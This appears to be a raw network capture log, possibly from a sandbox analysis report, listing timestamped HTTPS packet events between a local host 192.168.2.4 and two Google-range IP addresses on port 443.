Dec 16, 2024 18:28:42.109729052 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:42.109744072 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:43.807100058 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:43.807225943 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:43.807866096 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:43.807929993 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:43.853358030 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:43.853374004 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:43.853594065 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:43.853647947 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:43.857065916 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:43.903320074 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:44.726521015 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:44.726602077 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:44.726617098 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:44.726664066 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:44.726811886 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:44.726835966 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:44.726885080 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:44.879934072 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:44.880033016 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:44.880166054 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:44.880470037 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:44.880500078 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:46.578030109 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:46.578165054 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:46.582654953 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:46.582684040 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:46.582962036 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:46.583034039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:46.583388090 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:46.631336927 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.392467022 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.392709970 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.405150890 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.405373096 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.432411909 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.432548046 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.512567997 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.512715101 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.513799906 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.513928890 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.583929062 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.584028959 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.587526083 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.587637901 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.587671041 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.587738991 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.592969894 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.593045950 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.600295067 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.600351095 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.601514101 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.601598024 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.608911991 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.609011889 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.613214016 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.613292933 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.617553949 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.617620945 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.626780987 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.627166986 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.630506992 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.630579948 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.641366959 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.641470909 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.644814014 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.644891024 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.653943062 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.654047966 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.657449007 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.657514095 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.667726040 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.667831898 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.671133995 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.671199083 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.681277990 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.681349039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.684777021 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.684844017 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.694988012 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.695210934 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.696930885 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.697000027 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.708509922 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.708612919 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.708647013 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.708718061 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.728904009 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.729079962 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.746567965 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.746731997 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.746752024 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.746819019 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.775552034 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.775753021 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.775785923 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.775855064 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.778290033 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.778362989 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.778486013 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.778553963 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.783144951 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.783215046 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.786133051 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.786240101 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.786334038 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.786401033 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.797349930 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.797456980 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.797470093 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.797614098 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.797627926 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.797693968 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.807565928 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.807693005 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.807723045 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.807868004 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.818173885 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.818294048 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.818383932 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.818532944 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.828568935 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.828774929 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.828804970 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.828977108 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.839087009 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.839179993 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.839199066 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.839348078 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.848740101 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.848829031 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.848843098 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.849001884 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.858676910 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.858767986 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.858802080 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.859011889 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.869096041 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.869286060 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.869299889 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.869365931 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.878739119 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.878815889 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.878870010 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.879020929 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.888700008 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.888792992 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.888830900 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.889004946 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.898078918 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.898160934 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.898175001 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.898231030 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.907591105 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.907689095 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.907730103 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.908010006 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.915566921 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.915671110 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.915688038 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.915751934 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.915765047 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.915827036 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.917074919 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.917144060 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.923978090 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.924067020 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.925266027 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.925332069 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.932444096 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.932543993 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.933449030 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.933516026 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.938790083 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.938882113 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.939946890 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.940025091 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.949067116 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.949176073 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.950273037 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.950345039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.950802088 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.950869083 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.953555107 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.953625917 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.957182884 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.957257986 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.958197117 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.958261967 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.963541031 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.963649988 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.966872931 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.966943979 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.969403028 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.969552040 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.970566034 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.970635891 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.974993944 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.975095987 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.975883961 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.975954056 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.979856968 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.979942083 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.981209993 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.981290102 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.985275030 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.985380888 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.986632109 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.986702919 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.990243912 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.990323067 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.990391016 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.990456104 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.995520115 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.995670080 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:49.995779991 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:49.995840073 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.000560999 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.000633001 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.000658035 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.000710011 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.005836010 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.005959034 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.005965948 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.006020069 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.010744095 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.010822058 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.010854006 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.010912895 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.015788078 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.015852928 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.015996933 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.016238928 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.020662069 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.020745039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.020776987 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.020838976 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.025744915 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.025804996 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.025829077 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.025893927 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.030778885 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.030855894 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.030904055 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.031013012 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.035733938 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.035801888 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.035819054 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.035891056 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.040647030 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.040714979 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.040760040 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.040828943 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.045347929 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.045450926 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.045521975 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.045584917 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.050415993 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.050489902 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.050507069 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.050576925 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.054817915 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.054892063 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.054936886 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.055003881 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.060848951 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.060939074 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.061115026 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.061182976 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.064289093 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.064361095 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.064522982 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.064587116 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.071346998 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.071438074 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.071631908 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.071696043 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.073765993 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.073833942 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.073853970 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.073915005 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.080665112 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
